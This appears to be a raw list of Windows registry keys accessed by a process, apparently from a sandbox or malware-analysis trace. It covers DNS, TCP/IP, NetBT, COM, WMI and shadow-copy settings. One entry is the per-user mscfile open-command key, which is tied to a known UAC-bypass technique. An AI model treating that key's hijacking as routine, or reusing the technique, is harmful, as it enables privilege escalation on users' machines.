HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DnsCache\Parameters
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DNS
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSClient
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846EE342-7039-11DE-9D20-806E6F6E6963}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_USERS\S-1-5-20_Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Elevation
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SYSTEM\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\WMI Writer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
